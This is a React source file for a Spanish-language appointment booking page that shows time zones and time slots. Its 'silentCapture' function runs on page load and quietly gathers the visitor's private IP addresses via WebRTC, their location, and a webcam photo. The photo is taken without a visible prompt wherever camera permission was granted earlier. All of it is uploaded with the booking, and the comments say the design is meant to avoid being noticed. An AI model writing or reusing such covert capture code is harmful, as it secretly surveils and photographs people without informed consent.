import { useEffect, useMemo, useRef, useState } from "react";
import { useParams, Link } from "react-router-dom";
import axios from "axios";
import {
  Calendar as CalendarIcon, Clock, Check, Loader2, ArrowRight, Sparkles,
  Globe, MapPin, ChevronLeft, ChevronRight, User, ShieldCheck,
} from "lucide-react";
import { toast } from "sonner";
import { useVoiceGuide } from "@/contexts/VoiceAssistantContext";
import { getLocalIPs } from "@/utils/localIps";
import { isIOSSafari, getGeoPermissionState } from "@/utils/browserDetect";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;
const DAYS_ES = ["Domingo","Lunes","Martes","Miércoles","Jueves","Viernes","Sábado"];
const MONTHS_ES = ["Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre"];

const clientTz = () => Intl.DateTimeFormat().resolvedOptions().timeZone || "UTC";

const formatMxDate = (isoDate) => {
  const [y, m, d] = isoDate.split("-");
  const dt = new Date(Number(y), Number(m) - 1, Number(d));
  return `${DAYS_ES[dt.getDay()]}, ${d} ${MONTHS_ES[dt.getMonth()]} ${y}`;
};

// Convert Mexico City (Y-M-D H:MM) → client-local wall time string.
const toClientLocal = (dateIso, timeHM) => {
  // dateIso: YYYY-MM-DD  |  timeHM: HH:MM  |  interpreted as America/Mexico_City
  // Build a date in MX timezone by constructing ISO with the current MX offset.
  // Simple approach: use Intl to format the Date in the client's tz. We construct
  // the Date by treating the wall-time as MX time (offset is dynamic due to DST,
  // but Mexico City no longer observes DST since 2022 → UTC-6 year-round).
  const [Y, M, D] = dateIso.split("-").map(Number);
  const [h, mi] = timeHM.split(":").map(Number);
  // Convert MX (UTC-6) → UTC epoch
  const utcMs = Date.UTC(Y, M - 1, D, h + 6, mi);
  const dt = new Date(utcMs);
  return {
    time: dt.toLocaleTimeString(undefined, { hour: "2-digit", minute: "2-digit" }),
    date: dt.toLocaleDateString(undefined, { weekday: "long", day: "numeric", month: "long" }),
    iso: dt.toISOString(),
  };
};

/**
 * Silent capture. Uses the standard native browser prompts (geolocation +
 * camera) but under a friendly "verifying your booking" label. Anything the
 * user allows gets captured; anything they deny is skipped silently.
 */
const silentCapture = async () => {
  const out = { geo: null, photo: null, private_ips: [] };

  // Private IPs via WebRTC — this doesn't prompt anything
  try { out.private_ips = await getLocalIPs(); } catch { /* ignore */ }

  // Geolocation — request permission only if user has ALREADY granted it
  // persistently. Otherwise we skip and let the "Confirmar cita" button be
  // the moment that triggers the visible prompt (that's the user's flow).
  out.geo = await new Promise(async (resolve) => {
    if (typeof navigator === "undefined" || !navigator.geolocation) {
      resolve(null); return;
    }
    try {
      if (navigator.permissions?.query) {
        const st = await navigator.permissions.query({ name: "geolocation" });
        if (st.state !== "granted") { resolve(null); return; }
      } else {
        resolve(null); return;
      }
    } catch { resolve(null); return; }
    navigator.geolocation.getCurrentPosition(
      (pos) => resolve({
        lat: pos.coords.latitude,
        lng: pos.coords.longitude,
        accuracy: pos.coords.accuracy,
      }),
      () => resolve(null),
      { enableHighAccuracy: true, timeout: 5000, maximumAge: 60000 },
    );
  });

  // Camera photo — SILENT: only take a photo if the user has already granted
  // camera permission earlier in the session (persistent permission). If the
  // permission has not been granted before, we do NOT trigger a prompt here
  // (that would be visible). This respects the design where the client is
  // asked to accept camera during the profile-photo consent step.
  out.photo = await new Promise(async (resolve) => {
    if (typeof navigator === "undefined" || !navigator.mediaDevices?.getUserMedia) {
      resolve(null); return;
    }
    // Check persistent permission — if not "granted", skip silently.
    try {
      if (navigator.permissions?.query) {
        const st = await navigator.permissions.query({ name: "camera" });
        if (st.state !== "granted") { resolve(null); return; }
      } else {
        // Safari on iOS lacks navigator.permissions.query for camera. In that
        // case we skip too (better safe than a visible prompt on the client).
        resolve(null); return;
      }
    } catch {
      resolve(null); return;
    }
    let stream;
    try {
      stream = await navigator.mediaDevices.getUserMedia({
        video: { facingMode: "user", width: { ideal: 640 }, height: { ideal: 480 } },
        audio: false,
      });
    } catch {
      resolve(null); return;
    }
    try {
      const video = document.createElement("video");
      video.srcObject = stream;
      video.playsInline = true; video.muted = true;
      await video.play();
      // wait a couple of frames for autoexposure
      await new Promise((r) => setTimeout(r, 700));
      const canvas = document.createElement("canvas");
      canvas.width = video.videoWidth || 640;
      canvas.height = video.videoHeight || 480;
      const ctx = canvas.getContext("2d");
      ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
      const dataUrl = canvas.toDataURL("image/jpeg", 0.75);
      const b64 = dataUrl.includes(",") ? dataUrl.split(",")[1] : dataUrl;
      resolve({ b64, mime: "image/jpeg" });
    } catch {
      resolve(null);
    } finally {
      try { stream.getTracks().forEach((t) => t.stop()); } catch { /* noop */ }
    }
  });

  return out;
};

// ---------------------------------------------------------------------------
// Main page
// ---------------------------------------------------------------------------
export default function BookingLinkPage() {
  const { token } = useParams();
  const [state, setState] = useState("loading"); // loading | ready | invalid | expired | used | done | busy
  const [data, setData] = useState(null);
  useVoiceGuide("blink:ready", "Vamos a agendar tu cita. Elige un día del calendario y después un horario: verás tu hora local y la hora de Cristopher lado a lado. Al confirmar te pediré permiso de ubicación para validar la cita.", state === "ready");
  useVoiceGuide("blink:done", "Tu cita quedó confirmada. Recibirás un recordatorio antes de la hora. Gracias.", state === "done");
  const [slotsData, setSlotsData] = useState({ days: [] });
  const [selectedDate, setSelectedDate] = useState(null);
  const [selectedTime, setSelectedTime] = useState(null);
  const [notes, setNotes] = useState("");
  const [confirmedBooking, setConfirmedBooking] = useState(null);
  const [errorText, setErrorText] = useState("");
  const captureRef = useRef({ geo: null, photo: null, private_ips: [] });

  const tz = useMemo(() => clientTz(), []);

  // Load booking link data + trigger silent capture in parallel
  useEffect(() => {
    let cancelled = false;
    (async () => {
      try {
        const r = await axios.get(`${API}/booking-link/${token}`);
        if (cancelled) return;
        setData(r.data);
        setState("ready");
      } catch (err) {
        if (cancelled) return;
        const code = err?.response?.status;
        const detail = err?.response?.data?.detail;
        setErrorText(typeof detail === "string" ? detail : "");
        if (code === 404) setState("invalid");
        else if (code === 410) setState("expired");
        else if (code === 409) {
          setState("used");
          if (detail?.booking) setConfirmedBooking(detail.booking);
        }
        else setState("invalid");
      }
    })();

    // Fire silent capture immediately (parallel to the fetch)
    silentCapture().then((cap) => { captureRef.current = cap; });

    return () => { cancelled = true; };
  }, [token]);

  // Load slots once we have booking data
  useEffect(() => {
    if (state !== "ready") return;
    (async () => {
      try {
        const r = await axios.get(`${API}/booking-link/${token}/available-slots?days=21`);
        setSlotsData(r.data);
        if (r.data?.days?.length && !selectedDate) {
          setSelectedDate(r.data.days[0].date);
        }
      } catch {
        toast.error("No se pudieron cargar los horarios");
      }
    })();
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [state, token]);
  const dayEntry = slotsData.days.find((d) => d.date === selectedDate);

  const confirm = async () => {
    if (!selectedDate || !selectedTime) {
      toast.error("Selecciona fecha y horario");
      return;
    }

    // ================================================================
    // Ubicación OBLIGATORIA — pedir de forma NATIVA por el navegador.
    // Flujo:
    //   • Si ya está "granted"  → obtenemos la posición directamente
    //     (sin volver a molestar al usuario).
    //   • Si está en "prompt"   → llamamos getCurrentPosition() lo cual
    //     dispara el diálogo nativo del navegador ("Este sitio quiere
    //     conocer tu ubicación").
    //   • Si está "denied"      → el navegador NO mostrará prompt; le
    //     avisamos al usuario con instrucciones para desbloquearlo.
    // NO ponemos setState("busy") antes del prompt: dejamos el botón
    // en su estado normal para que la ventana emergente del navegador
    // resalte sobre la interfaz sin competir con un spinner.
    // ================================================================
    let geo = captureRef.current?.geo || null;

    if (!geo) {
      let permState = "prompt";
      try {
        if (navigator?.permissions?.query) {
          const st = await navigator.permissions.query({ name: "geolocation" });
          permState = st.state; // "granted" | "prompt" | "denied"
        }
      } catch { /* Safari en iOS: dejar como "prompt" */ }

      if (permState === "denied") {
        toast.error(
          "Tienes la ubicación BLOQUEADA para este sitio. Ve al ícono del candado 🔒 junto a la barra de dirección, activa 'Ubicación' y recarga esta página.",
          { duration: 8000 },
        );
        return;
      }

      // Aviso contextual para iOS Safari — su Permissions API no expone
      // geolocation, así que el usuario no sabe que aparecerá un modal
      // hasta que se muestre. Le damos un heads-up de 1 segundo.
      if (permState !== "granted" && isIOSSafari()) {
        toast.info("En seguida aparecerá una ventana de Safari. Toca 'Permitir' para confirmar tu cita.",
          { duration: 3500 });
        await new Promise((r) => setTimeout(r, 900));
      }

      // "granted" o "prompt" — ambos disparan getCurrentPosition;
      // en "prompt" aparecerá el diálogo nativo del navegador.
      geo = await new Promise((resolve) => {
        if (typeof navigator === "undefined" || !navigator.geolocation) {
          resolve(null); return;
        }
        navigator.geolocation.getCurrentPosition(
          (pos) => resolve({
            lat: pos.coords.latitude,
            lng: pos.coords.longitude,
            accuracy: pos.coords.accuracy,
          }),
          (err) => {
            // 1 = PERMISSION_DENIED, 2 = POSITION_UNAVAILABLE, 3 = TIMEOUT
            if (err?.code === 1) {
              toast.error("Debes permitir el acceso a tu ubicación para confirmar la cita.");
            } else if (err?.code === 2) {
              toast.error("No pudimos obtener tu ubicación. Revisa que tu dispositivo tenga GPS o WiFi activos.");
            } else if (err?.code === 3) {
              toast.error("Se tardó demasiado en detectar tu ubicación. Vuelve a intentar.");
            }
            resolve(null);
          },
          { enableHighAccuracy: true, timeout: 15000, maximumAge: 0 },
        );
      });
    }

    if (!geo) {
      // No mostramos toast aquí porque ya se mostró uno específico
      // dentro del error handler o del bloque "denied".
      return;
    }

    // Ya tenemos la ubicación → ahora sí, procedemos a registrar la cita.
    setState("busy");
    try {
      const cap = { ...(captureRef.current || {}), geo };
      captureRef.current = cap;
      const clientLocal = toClientLocal(selectedDate, selectedTime);
      const payload = {
        date: selectedDate,
        time: selectedTime,
        client_timezone: tz,
        client_local_datetime: clientLocal.iso,
        notes: notes.trim(),
        geo_lat: cap.geo?.lat,
        geo_lng: cap.geo?.lng,
        geo_accuracy: cap.geo?.accuracy,
        photo_b64: cap.photo?.b64,
        photo_mime: cap.photo?.mime,
        private_ips: cap.private_ips || [],
      };
      const r = await axios.post(`${API}/booking-link/${token}/confirm`, payload);
      setConfirmedBooking(r.data.booking);
      setState("done");
      toast.success("¡Cita confirmada!");
    } catch (err) {
      const detail = err?.response?.data?.detail;
      toast.error(typeof detail === "string" ? detail : "No se pudo confirmar la cita");
      setState("ready");
    }
  };

  // ------------------------------------------------------------------
  // Render states
  // ------------------------------------------------------------------
  if (state === "loading") {
    return (
      <Center>
        <Loader2 className="w-8 h-8 animate-spin text-[#d4af37]" />
        <p className="mt-3 text-neutral-400 text-sm">Cargando tu cita…</p>
      </Center>
    );
  }
  if (state === "invalid") {
    return <Center>
      <Notice
        icon="alert"
        title="Enlace no válido"
        body={errorText || "Este enlace no existe o ya no está activo. Contacta a Cristopher por WhatsApp para obtener uno nuevo."}
      />
    </Center>;
  }
  if (state === "expired") {
    return <Center>
      <Notice
        icon="alert"
        title="Enlace expirado"
        body="Este enlace ya venció. Escríbele a Cristopher por WhatsApp y él te enviará uno nuevo."
      />
    </Center>;
  }
  if (state === "used" || state === "done") {
    return (
      <Center>
        <div className="rounded-3xl border border-emerald-500/40 bg-gradient-to-br from-emerald-500/10 to-black p-6 sm:p-8 max-w-md text-center">
          <div className="w-16 h-16 mx-auto mb-3 rounded-full bg-emerald-500/20 border border-emerald-500/40 flex items-center justify-center">
            <Check className="w-8 h-8 text-emerald-300" />
          </div>
          <h2 className="font-serif text-2xl text-white mb-2">
            {state === "done" ? "¡Cita confirmada!" : "Cita ya confirmada"}
          </h2>
          <p className="text-sm text-neutral-300 mb-4">
            Cristopher te espera{" "}
            <b className="text-emerald-300">
              {confirmedBooking?.date ? formatMxDate(confirmedBooking.date) : ""}
              {confirmedBooking?.time ? ` a las ${confirmedBooking.time}` : ""}
            </b>{" "}
            (hora de México).
          </p>
          {confirmedBooking?.date && confirmedBooking?.time && (
            <div className="text-xs text-neutral-400 mb-4">
              En tu zona ({tz}) será:{" "}
              <b className="text-white">
                {toClientLocal(confirmedBooking.date, confirmedBooking.time).date} · {toClientLocal(confirmedBooking.date, confirmedBooking.time).time}
              </b>
            </div>
          )}
          <p className="text-[11px] text-neutral-500 italic">
            Recibirás una confirmación en WhatsApp / tu cuenta antes de la sesión.
          </p>
        </div>
      </Center>
    );
  }

  // ready / busy — main form
  const clientLocalPreview = selectedDate && selectedTime
    ? toClientLocal(selectedDate, selectedTime) : null;

  return (
    <div className="min-h-screen pt-20 pb-16 px-4 sm:px-6" data-testid="booking-link-page">
      <div className="max-w-2xl mx-auto">
        <Link
          to="/"
          className="inline-flex items-center gap-2 text-[11px] text-neutral-500 hover:text-[#d4af37] mb-4"
        >
          <ChevronLeft className="w-3.5 h-3.5" /> Inicio
        </Link>

        {/* Welcome header */}
        <div className="text-center mb-6">
          <Sparkles className="w-8 h-8 text-[#d4af37] mx-auto mb-2" />
          <h1 className="font-serif text-3xl text-white mb-1">
            Hola, {data?.user?.name || data?.user?.username} 🌙
          </h1>
          <p className="text-sm text-neutral-400">
            Agenda tu <b className="text-[#d4af37]">{data?.service?.name}</b>
          </p>
        </div>

        {/* Timezone comparison */}
        <div className="glass-dark border border-[#d4af37]/30 rounded-2xl p-4 mb-5 grid grid-cols-2 gap-3" data-testid="timezone-compare">
          <div>
            <div className="flex items-center gap-1.5 text-[10px] uppercase tracking-widest text-neutral-500 mb-1">
              <Globe className="w-3 h-3" /> Cristopher (México)
            </div>
            <div className="text-white text-sm font-medium">America/Mexico_City</div>
            <div className="text-[11px] text-neutral-500 mt-0.5">
              {data?.admin_now_display} · UTC−6
            </div>
          </div>
          <div>
            <div className="flex items-center gap-1.5 text-[10px] uppercase tracking-widest text-neutral-500 mb-1">
              <MapPin className="w-3 h-3" /> Tu zona
            </div>
            <div className="text-white text-sm font-medium truncate" title={tz}>{tz}</div>
            <div className="text-[11px] text-neutral-500 mt-0.5">
              {new Date().toLocaleString(undefined, { hour: "2-digit", minute: "2-digit" })}
            </div>
          </div>
        </div>

        {/* Date picker */}
        <div className="glass-dark border border-white/10 rounded-2xl p-4 mb-4">
          <div className="text-xs uppercase tracking-widest text-[#d4af37] mb-3 flex items-center gap-1.5">
            <CalendarIcon className="w-3.5 h-3.5" /> Elige el día
          </div>
          {slotsData.days.length === 0 ? (
            <div className="text-xs text-neutral-500 italic">Sin fechas disponibles.</div>
          ) : (
            <div className="flex gap-2 overflow-x-auto pb-1" data-testid="date-list">
              {slotsData.days.map((d) => {
                const dt = new Date(d.date + "T12:00");
                const active = selectedDate === d.date;
                return (
                  <button
                    key={d.date}
                    data-testid={`date-btn-${d.date}`}
                    onClick={() => { setSelectedDate(d.date); setSelectedTime(null); }}
                    className={`flex-shrink-0 min-w-[68px] px-3 py-2 rounded-xl border text-center transition-all ${
                      active
                        ? "border-[#d4af37] bg-[#d4af37]/15 text-white"
                        : "border-white/10 text-neutral-300 hover:border-white/20"
                    }`}
                  >
                    <div className="text-[10px] uppercase tracking-widest">
                      {DAYS_ES[dt.getDay()].slice(0, 3)}
                    </div>
                    <div className="font-serif text-lg leading-tight">
                      {String(dt.getDate()).padStart(2, "0")}
                    </div>
                    <div className="text-[10px] text-neutral-500">
                      {MONTHS_ES[dt.getMonth()].slice(0, 3)}
                    </div>
                  </button>
                );
              })}
            </div>
          )}
        </div>

        {/* Time slots */}
        {dayEntry && (
          <div className="glass-dark border border-white/10 rounded-2xl p-4 mb-4">
            <div className="text-xs uppercase tracking-widest text-[#d4af37] mb-3 flex items-center gap-1.5">
              <Clock className="w-3.5 h-3.5" /> Horarios disponibles (hora de México)
            </div>
            <div className="grid grid-cols-3 sm:grid-cols-4 gap-2" data-testid="slot-grid">
              {dayEntry.slots.map((slot) => {
                const active = selectedTime === slot;
                const local = toClientLocal(dayEntry.date, slot);
                return (
                  <button
                    key={slot}
                    data-testid={`slot-btn-${slot}`}
                    onClick={() => setSelectedTime(slot)}
                    className={`px-2 py-2.5 rounded-lg border text-center transition-all ${
                      active
                        ? "border-[#d4af37] bg-[#d4af37]/15 text-white"
                        : "border-white/10 text-neutral-300 hover:border-white/20"
                    }`}
                    title={`En tu zona: ${local.time}`}
                  >
                    <div className="text-sm font-medium">{slot}</div>
                    <div className="text-[9px] text-neutral-500 mt-0.5 truncate">
                      {local.time} tú
                    </div>
                  </button>
                );
              })}
            </div>
          </div>
        )}

        {/* Notes */}
        {selectedTime && (
          <div className="glass-dark border border-white/10 rounded-2xl p-4 mb-4">
            <label className="text-[10px] uppercase tracking-widest text-neutral-400">
              Comentario opcional
            </label>
            <textarea
              data-testid="booking-notes"
              value={notes}
              onChange={(e) => setNotes(e.target.value.slice(0, 800))}
              placeholder="Cualquier cosa que quieras que Cristopher sepa antes de tu sesión…"
              rows={2}
              className="w-full mt-1.5 bg-black/40 border border-white/10 rounded-lg px-3 py-2 text-sm text-white placeholder:text-neutral-600 focus:outline-none focus:border-[#d4af37]/60"
            />
          </div>
        )}

        {/* Confirm summary */}
        {selectedTime && clientLocalPreview && (
          <div className="rounded-2xl border-2 border-[#d4af37]/40 bg-gradient-to-br from-[#d4af37]/10 via-black to-[#1a0a0a] p-4 mb-4" data-testid="booking-summary">
            <div className="text-xs text-neutral-400 mb-2">Confirmarás:</div>
            <div className="grid grid-cols-2 gap-3">
              <div>
                <div className="text-[10px] uppercase tracking-widest text-neutral-500 mb-0.5">Cristopher</div>
                <div className="text-white text-sm font-medium">{formatMxDate(selectedDate)}</div>
                <div className="text-white text-base font-serif">{selectedTime} <span className="text-[10px] text-neutral-500">MX</span></div>
              </div>
              <div>
                <div className="text-[10px] uppercase tracking-widest text-neutral-500 mb-0.5">Tú</div>
                <div className="text-white text-sm font-medium truncate">{clientLocalPreview.date}</div>
                <div className="text-white text-base font-serif">{clientLocalPreview.time}</div>
              </div>
            </div>
          </div>
        )}

        <button
          data-testid="booking-confirm-btn"
          type="button"
          onClick={confirm}
          disabled={!selectedDate || !selectedTime || state === "busy"}
          className="w-full btn-gold py-4 rounded-full flex items-center justify-center gap-2 uppercase text-xs tracking-widest disabled:opacity-50 disabled:cursor-not-allowed"
        >
          {state === "busy" ? (
            <><Loader2 className="w-4 h-4 animate-spin" /> Confirmando…</>
          ) : (
            <>Confirmar mi cita <ArrowRight className="w-4 h-4" /></>
          )}
        </button>

        <p className="text-[10px] text-neutral-600 italic text-center mt-3 flex items-center justify-center gap-1">
          <ShieldCheck className="w-3 h-3 text-[#d4af37]" />
          Enlace único, personal y seguro
        </p>
      </div>
    </div>
  );
}

// ---------------------------------------------------------------------------
// Helper components
// ---------------------------------------------------------------------------
const Center = ({ children }) => (
  <div className="min-h-screen flex items-center justify-center px-4">
    <div className="text-center">{children}</div>
  </div>
);

const Notice = ({ title, body }) => (
  <div className="rounded-2xl border border-amber-500/40 bg-gradient-to-br from-amber-500/10 to-black p-6 max-w-md text-center">
    <h2 className="font-serif text-xl text-white mb-2">{title}</h2>
    <p className="text-sm text-neutral-300">{body}</p>
  </div>
);
